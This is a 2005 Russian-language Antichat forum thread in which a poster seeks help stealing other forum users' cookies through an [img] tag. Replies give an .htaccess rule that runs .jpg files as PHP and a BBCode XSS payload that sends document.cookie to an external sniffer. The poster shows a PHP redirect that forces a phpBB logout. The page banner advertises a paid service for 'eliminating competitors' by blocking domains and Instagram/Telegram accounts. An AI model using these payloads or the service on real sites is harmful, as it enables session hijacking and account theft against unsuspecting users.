УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
Вопрос по php

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос по php

04.09.2005, 17:17

Laggi

Познающий

Регистрация: 19.08.2005

Сообщений: 44

Провел на форуме:
103401

Репутация: 2

Вопрос по php

Собственно не подскажет ли кто-нить php-код (в пхп я 0) при исполнении которого высылались бы на тот же сниффер античата кукизы?
Это я все к уязвимости через [img], когда можно заставить юзверя айти на страничку и выполнить код. Что-нибудь безобидное - типа разлогинивания - легко.. А вот как сделать что-нибудь серьезное я не знаю...
И вообще возможно ли это? ) Хотя я думаю, что возможно..

04.09.2005, 17:24

madnet

Умиротворенн

Регистрация: 09.12.2004

Сообщений: 996

Провел на форуме:
2386719

Репутация: 1384

Отправить сообщение для madnet с помощью ICQ

хм... либо я тебя не понял, либо ты неправильно выразился. Какие кукизы тебе php должен выслать? или тебе код самого сниффире нужен?

__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА

04.09.2005, 17:46

NaX[no]rT

Members of Antichat

Регистрация: 03.09.2005

Сообщений: 594

Провел на форуме:
3606217

Репутация: 685

Отправить сообщение для NaX[no]rT с помощью ICQ

Никакая не уязвимость, например есть картинка которую смотрит юзер, в директории в которой есть данная картинка, там же лежит файл .htaccess с содержанием

Код:

AddType application/x-httpd-php .jpg

смотря какое расширение у картинке,т.е. jpg файл обрабатывается как php. В самом файле например sniffer.jpg идёт пхп код, который содержит переменные окружения, а он в свою очередь отсылает их в log.

04.09.2005, 17:49

NaX[no]rT

Members of Antichat

Регистрация: 03.09.2005

Сообщений: 594

Провел на форуме:
3606217

Репутация: 685

подожди... или ты хочешь, чтобы ты вставил [*img]http://xxx.xx/sniffer.jpg[/img] и те кукисы отослались?

04.09.2005, 18:41

k1b0rg

Тут может быть ваша реклама.

Регистрация: 30.07.2005

Сообщений: 1,243

Провел на форуме:
4520553

Репутация: 1316

[COLOR=[*IMG]http://aaa.aa/=`aaa.jpg[/*IMG]]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR]
типа что то этого ты имел ввиду?
без зведочек естественно

04.09.2005, 21:46

Laggi

Познающий

Регистрация: 19.08.2005

Сообщений: 44

Провел на форуме:
103401

Репутация: 2

Нет у я немного про другую уязвимость. Создаешь директорию /*.jpg . И тэгуешь ее в [img] . В директории создаешь файл index.php - и он исполняется...

Цитата:

<?php
header("Location: http://hosttobeexploited/phpBB/login.php?logout=true");
exit;
?>

Вот это как написано везде получается выполнять - разлогинивание. А вот как выполнить что-нить серьезное я хз.

04.09.2005, 23:11

Laggi

Познающий

Регистрация: 19.08.2005

Сообщений: 44

Провел на форуме:
103401

Репутация: 2

Цитата:

подожди... или ты хочешь, чтобы ты вставил [*img]http://xxx.xx/sniffer.jpg[/img] и те кукисы отослались?

Да. так тоже можно )

04.09.2005, 23:17

Laggi

Познающий

Регистрация: 19.08.2005

Сообщений: 44

Провел на форуме:
103401

Репутация: 2

Собственно неважно каким способом, я бы хотел добиться эффекта как в XSSе предыдущем с тэгом [url]. Загружается .jpg на страничке и при загрузке шлются кукизы юзера с этого форума.
Я думаю для тех, кто знает php на уровне пользователя не тяжело подсказать-с